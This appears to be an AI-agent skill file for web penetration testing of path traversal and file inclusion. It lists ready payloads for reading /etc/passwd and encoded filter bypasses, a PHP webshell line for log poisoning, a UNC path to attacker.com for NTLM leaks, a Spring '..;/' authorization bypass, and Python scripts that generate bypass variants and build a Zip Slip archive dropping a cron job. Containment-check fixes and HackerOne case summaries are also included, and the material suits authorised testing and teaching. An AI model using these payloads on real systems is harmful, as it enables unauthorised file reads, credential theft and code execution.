Path Traversal Penetration Testing Patterns
Load this Skill when pentesting a web application for path traversal and file inclusion. Covers LFI, RFI, Zip Slip and related techniques.
Attack Surface Discovery
High-risk functionality:
- File download/view: /download?file=report.pdf, /view?path=image.png
- Template/theme selection: ?template=default, ?theme=dark
- Log viewers: /logs?file=access.log
- Post-upload processing (archive extraction, preview generation)
- Backup/export features
- Static asset serving: /static/, /assets/ paths
- Language/locale settings: ?lang=en, ?locale=zh-CN
Recognition signals:
- A parameter value looks like a file path or file name
- The response contains file contents (rather than database records)
- A file extension appears in a parameter value
- Error messages disclose file-system paths
Exploitation Techniques
Basic path traversal:
# Linux
../../../etc/passwd
....//....//....//etc/passwd   (a filter that strips "../" once, non-recursively, leaves "../" behind)
..%2f..%2f..%2fetc/passwd
# Windows
..\..\..\windows\win.ini
..%5c..%5c..%5cwindows\win.ini
Encoding bypasses:
# URL encoding
%2e%2e%2f → ../
%2e%2e/ → ../
..%2f → ../
# Double encoding (works when the path is decoded twice, e.g. once by a proxy or the container and again by the application)
%252e%252e%252f → ../
# Unicode/UTF-8
..%c0%af → ../ (overlong UTF-8 encoding of "/", accepted only by lenient decoders)
..%ef%bc%8f → ../ (fullwidth solidus U+FF0F, folded to "/" by best-fit normalization)
# Null byte (PHP before 5.3.4, older Java runtimes)
../../../etc/passwd%00.png
../../../etc/passwd\0.png
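Every variant above exploits the same defect: the filter inspects a different string than the one the file system finally opens. The script below is an added example, not part of the original Skill. It generates the encoded variants, passes them through a deliberately naive filter that strips "../" once before URL-decoding, then simulates what a back end does afterwards (decode, join with the web root, normalize) and reports which variants still reach the target. The web root /var/www/html, the filter itself and the toggles for double decoding, lenient (overlong) UTF-8 and NUL truncation are constructed assumptions, not the behaviour of any specific product.

```python
from __future__ import annotations

import posixpath
from urllib.parse import unquote, unquote_to_bytes

# Constructed scenario (assumption, not a real target): files are served relative to
# WEB_ROOT and the attacker wants to read TARGET.
WEB_ROOT = "/var/www/html"
TARGET = "/etc/passwd"


def traversal_variants(depth: int = 3, target: str = "etc/passwd") -> dict[str, str]:
    """Encoded forms of ('../' * depth) + target, keyed by technique name."""
    up = "../" * depth
    return {
        "plain": up + target,
        "double_dot_slash": "....//" * depth + target,        # stripping '../' once leaves '../'
        "url_encoded": "%2e%2e%2f" * depth + target,           # dots and slash percent-encoded
        "slash_only_encoded": "..%2f" * depth + target,        # only the slash encoded
        "double_encoded": "%252e%252e%252f" * depth + target,  # needs two decode passes
        "overlong_utf8": "..%c0%af" * depth + target,          # overlong UTF-8 '/', lenient decoders only
        "null_byte": "..%2f" * depth + target + "%00.png",     # NUL truncation in old PHP/Java
    }


def naive_filter(user_path: str) -> str | None:
    """Vulnerable check (constructed): reject absolute paths, strip '../' once, all BEFORE decoding."""
    if user_path.startswith("/") or "\\" in user_path:
        return None
    return user_path.replace("../", "")


def decode_like_server(value: str, decode_passes: int = 1,
                       lenient_utf8: bool = False, nul_truncates: bool = False) -> str:
    """Simulate the decoding the back end applies after the filter has already run."""
    text = value
    for _ in range(decode_passes - 1):
        text = unquote(text)                  # e.g. a proxy or container turning '%25' into '%'
    raw = unquote_to_bytes(text)              # final pass yields raw bytes
    if lenient_utf8:
        raw = raw.replace(b"\xc0\xaf", b"/")  # a lenient decoder accepting the overlong '/'
    if nul_truncates:
        raw = raw.split(b"\x00", 1)[0]        # C-string semantics: the path ends at the first NUL
    return raw.decode("utf-8", errors="replace")


def resolve(decoded_path: str, web_root: str = WEB_ROOT) -> str:
    """What the file system ends up opening: join with the web root and collapse '..'."""
    return posixpath.normpath(posixpath.join(web_root, decoded_path))


def successful_bypasses(depth: int = 3, decode_passes: int = 1,
                        lenient_utf8: bool = False, nul_truncates: bool = False) -> dict[str, str]:
    """Variants that pass naive_filter() and still resolve to TARGET under the given server behaviour."""
    hits: dict[str, str] = {}
    for name, payload in traversal_variants(depth).items():
        cleaned = naive_filter(payload)
        if cleaned is None:
            continue
        if resolve(decode_like_server(cleaned, decode_passes, lenient_utf8, nul_truncates)) == TARGET:
            hits[name] = payload
    return hits


if __name__ == "__main__":
    for label, kwargs in [
        ("default server", {}),
        ("double-decoding server", {"decode_passes": 2}),
        ("lenient UTF-8 decoder", {"lenient_utf8": True}),
        ("NUL-truncating runtime", {"nul_truncates": True}),
    ]:
        print(f"{label}: {sorted(successful_bypasses(**kwargs))}")
```

With the default server model only the three variants that hide "../" from a pre-decoding string match succeed; double encoding, overlong UTF-8 and the null byte each need the corresponding server quirk, which is why they are worth trying even when the simpler forms fail. The fix the simulation points at is to decode fully, resolve against the base directory, and then check containment, rather than pattern-matching the raw input.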
Windows-specific tricks:
- Device names: the reserved DOS device names CON, PRN, AUX, NUL can be used to bypass path normalization
- UNC paths: \\attacker.com\share\file can trigger SSRF or leak NTLM credentials when the server authenticates to the attacker's share
- Short (8.3) file names: PROGRA~1 in place of Program Files
- ADS (Alternate Data Streams): file.txt::$DATA
Node.js-specific:
- Monkey-patching Buffer internals (e.g. Buffer.prototype.utf8Write) to alter the result of path.resolve() and bypass the permission model's path checks
- Passing the path as a Uint8Array instead of a string to bypass the permission model
- Mismatch between what path.normalize() returns and what the file system actually opens (e.g. Windows device names)
Java/Spring-specific:
- URL normalization differences between Spring and the servlet container: /static/..;/admin/secret bypasses Spring Security path matching (the matcher sees the /static/ prefix, while Tomcat strips the ;-delimited path parameter and resolves .. to /admin/secret)
- URL classloader: jar:file:///path/to/archive.jar!/entry reads an entry inside a jar
- Tomcat: %252F double encoding to bypass path filters
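The ..;/ trick works because two components disagree about what the path is. The following Python model is an added example written for this page, not Spring's or Tomcat's code: tomcat_style_normalize() approximates the container (strip the ;-delimited path parameter from each segment, then collapse ..), naive_prefix_allow() is a constructed authorization rule that matches the raw path against public prefixes, and hardened_allow() refuses ambiguous paths outright before matching on the normalized form. The prefixes /static/ and /public/ are assumptions.

```python
import posixpath

# Constructed public prefixes (assumption): anything under these is served without authentication.
PUBLIC_PREFIXES = ("/static/", "/public/")


def tomcat_style_normalize(request_path: str) -> str:
    """Approximation of what a servlet container does before dispatching: drop the
    ';name=value' path parameter from every segment, then collapse '.' and '..'."""
    segments = [segment.split(";", 1)[0] for segment in request_path.split("/")]
    return posixpath.normpath("/".join(segments))


def naive_prefix_allow(request_path: str) -> bool:
    """Vulnerable authorization (constructed): match the RAW request path against the prefixes.
    '/static/..;/admin/secret' starts with '/static/', so it is allowed."""
    return request_path.startswith(PUBLIC_PREFIXES)


def hardened_allow(request_path: str) -> bool:
    """Refuse anything the container would rewrite (path parameters, percent-encoding,
    '..' segments), then match on the same normalized path the container dispatches."""
    segments = request_path.split("/")
    if ";" in request_path or "%" in request_path or ".." in segments:
        return False
    return tomcat_style_normalize(request_path).startswith(PUBLIC_PREFIXES)


def evaluate(request_path: str) -> dict:
    """Side-by-side view: what the matcher decides versus where the container actually sends it."""
    return {
        "raw": request_path,
        "naive_allows": naive_prefix_allow(request_path),
        "hardened_allows": hardened_allow(request_path),
        "container_dispatches_to": tomcat_style_normalize(request_path),
    }


if __name__ == "__main__":
    for path in ("/static/css/app.css", "/static/..;/admin/secret", "/static/../admin/secret"):
        print(evaluate(path))
```

The naive rule approves the request while the container dispatches it to /admin/secret, which is exactly the bypass; the hardened rule rejects it. Spring Security's StrictHttpFirewall takes the same "reject ambiguous paths" approach, refusing requests containing semicolons, percent-encoded separators or .. segments by default.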
PHP-specific (LFI to RCE):
- PHP wrappers: php://filter/convert.base64-encode/resource=config.php returns the source base64-encoded instead of executing it, so the file can be read
- php://input: php://input with PHP code in the POST body (requires allow_url_include=On)
- Log poisoning: inject <?php system($_GET['cmd']); ?> via the User-Agent header, then include the access log through the LFI
- Session file inclusion: write PHP code into a session variable, then include /tmp/sess_SESSIONID (or /var/lib/php/sessions/sess_SESSIONID, depending on session.save_path)
Zip Slip / symlink attacks:
- Upload an archive whose entries contain ../../ path components
- Upload a tar/zip containing symlinks that point outside the extraction directory
- After extraction, arbitrary files are overwritten (configuration files, webshells)
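Both halves of the Zip Slip test, building the malicious upload and checking an extractor for the defect, fit in one script. The following is an added example for this page, not code from any project: build_zip_slip_archive() constructs an in-memory zip with a benign file, a ../-escaping entry and a symlink entry; find_unsafe_entries() is the containment check an extractor should run before writing anything, resolving each name against the destination and flagging symlinks by their Unix mode bits. The destination /var/app/uploads, the target etc/cron.d/evil and the payload are constructed assumptions.

```python
from __future__ import annotations

import io
import posixpath
import stat
import zipfile

# Constructed extraction directory (assumption): where the application unpacks uploads.
DEST = "/var/app/uploads"


def build_zip_slip_archive(payload: bytes, traversal_depth: int = 3,
                           target: str = "etc/cron.d/evil") -> bytes:
    """Constructed malicious upload: a benign file, a '../'-escaping entry and a symlink entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", b"harmless content")
        zf.writestr("../" * traversal_depth + target, payload)   # escapes DEST on a naive extractor
        link = zipfile.ZipInfo("config")
        link.create_system = 3                                    # Unix, so the mode bits are honoured
        link.external_attr = (stat.S_IFLNK | 0o777) << 16         # Unix mode lives in the high 16 bits
        zf.writestr(link, b"/etc")                                # a symlink entry's data is its target
    return buf.getvalue()


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """Zip stores the Unix st_mode in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def find_unsafe_entries(zip_bytes: bytes, dest: str = DEST) -> dict[str, str]:
    """Map each dangerous entry name to the reason it must not be extracted under dest."""
    dest = posixpath.normpath(dest)
    unsafe: dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_symlink(info):
                unsafe[name] = "symlink entry"
            elif name.startswith("/") or "\\" in name:
                unsafe[name] = "absolute or backslash path"
            else:
                # Resolve the way the extractor's open() would, then require containment.
                resolved = posixpath.normpath(posixpath.join(dest, name))
                if posixpath.commonpath([dest, resolved]) != dest:
                    unsafe[name] = f"escapes to {resolved}"
    return unsafe


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Vet the whole archive first; extract nothing if any entry is unsafe."""
    unsafe = find_unsafe_entries(zip_bytes, dest)
    if unsafe:
        raise ValueError(f"refusing to extract: {unsafe}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


if __name__ == "__main__":
    archive = build_zip_slip_archive(b"* * * * * root id > /tmp/pwned\n")
    for name, reason in find_unsafe_entries(archive).items():
        print(f"{name}: {reason}")
```

Checking containment after normalization, rather than searching names for "..", also catches names like "a/../../x" whose first component is harmless. The same two checks apply to tar: tarfile members expose issym()/islnk() and the same join-normalize-commonpath test on member.name.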
Detection Checklist
Impact Assessment
What exploitation can achieve:
- Sensitive file read: source code, configuration files (database credentials, API keys), /etc/shadow (only when the application process runs as root)
- Arbitrary file write: plant a webshell via Zip Slip or a write feature, leading to RCE
- Code execution: LFI + log poisoning (write PHP code into a log, then include it)
- Credential disclosure: read .env, config.yaml, SSH keys, etc.
Severity rating:
- Critical: database credentials/key files readable, or exploitable for RCE
- High: arbitrary file read (source, configuration) or arbitrary file write
- Medium: only a limited set of files readable; path is constrained so directories cannot be crossed
Real-World Cases
The following cases come from publicly disclosed HackerOne reports and show how this vulnerability class presents on real targets.
Case 1: IBM — Path Traversal Vulnerability found on IBM Cloud
- Severity: Critical | CWE: Path Traversal
- Summary: The path traversal vulnerability on IBM Cloud was reported by an external researcher, analyzed, and remediated. The vulnerability has been addressed.
- Report: https://hackerone.com/reports/3060373
Case 2: Basecamp — Arbitrary write in the application's data folder and arbitrary read of server's replies from 3rd party apps.
- Severity: High | CWE: Path Traversal
- Summary: A path traversal vulnerability was found in the Android app com.basecamp.bc3 version 3.26.3, allowing an attacker to write arbitrary files in the app's private directory. Additionally, the attacke...
- Report: https://hackerone.com/reports/1710541
Case 3: ExpressionEngine — Non-authenticated path traversal leading to arbitrary file read
- Severity: High | CWE: Path Traversal
- Summary: Non-authenticated path traversal leading to arbitrary file read. Insufficient user input filtering resulted in arbitrary file read by non-authenticated attacker, leading to sensitive information discl...
- Report: https://hackerone.com/reports/1096043
Case 4: Internet Bug Bounty — Path traversal by monkey-patching Buffer internals
- Severity: High | CWE: Path Traversal
- Summary: In Node.js 20 and 21, a path traversal vulnerability was introduced due to the ability to monkey-patch Buffer internals. By overwriting Buffer.prototype.utf8Write, an attacker could bypass the path re...
- Report: https://hackerone.com/reports/2434811
Case 5: Internet Bug Bounty — Path traversal through path stored in Uint8Array in Node.js 20
- Severity: High | CWE: Path Traversal
- Summary: A path traversal vulnerability was discovered in Node.js 20 through paths stored in Uint8Array objects. The vulnerability allowed bypassing path sanitization protections and reading arbitrary files ou...
- Report: https://hackerone.com/reports/2256167
Case 6: Internet Bug Bounty — Permission model improperly protects against path traversal in Node.js 20
- Severity: High | CWE: Path Traversal
- Summary: A path traversal vulnerability was introduced in Node.js 20 due to insufficient patching of CVE-2023-30584. The vulnerability arises because the permission model implementation does not protect itself...
- Report: https://hackerone.com/reports/2225660
Case 7: Internet Bug Bounty — (CVE-2023-32004) Permission model bypass by specifying a path traversal sequence in a Buffer
- Severity: High | CWE: Path Traversal
- Summary: A vulnerability was discovered in Node.js version 20, specifically within the experimental permission model. It allowed for a bypass of the permission model by specifying a path traversal sequence in ...
- Report: https://hackerone.com/reports/2104564
Case 8: Mozilla — Mozilla VPN Clients: RCE via file write and path traversal
- Severity: High | CWE: Path Traversal
- Summary: The report describes a path traversal vulnerability in the Mozilla VPN client software that allowed for remote code execution. The vulnerability was found in the "live_reload" command of the client's ...
- Report: https://hackerone.com/reports/2995025
Case 9: Node.js — Windows Device Names (CON, PRN, AUX) Bypass Path Traversal Protection in path.normalize()
- Severity: High | CWE: Path Traversal
- Summary: An incomplete fix has been identified for a vulnerability affecting Windows device names in the path.normalize() function in Node.js. The vulnerability allows path traversal protection to be bypasse...
- Report: https://hackerone.com/reports/3160912
Case 10: Node.js — Path traversal by monkey-patching Buffer internals
- Severity: High | CWE: Path Traversal
- Summary: A path traversal vulnerability was introduced in the experimental permission model in Node.js 20 and 21 by monkey-patching Buffer internals. This allowed modification of the result of path.resolve(), ...
- Report: https://hackerone.com/reports/2218653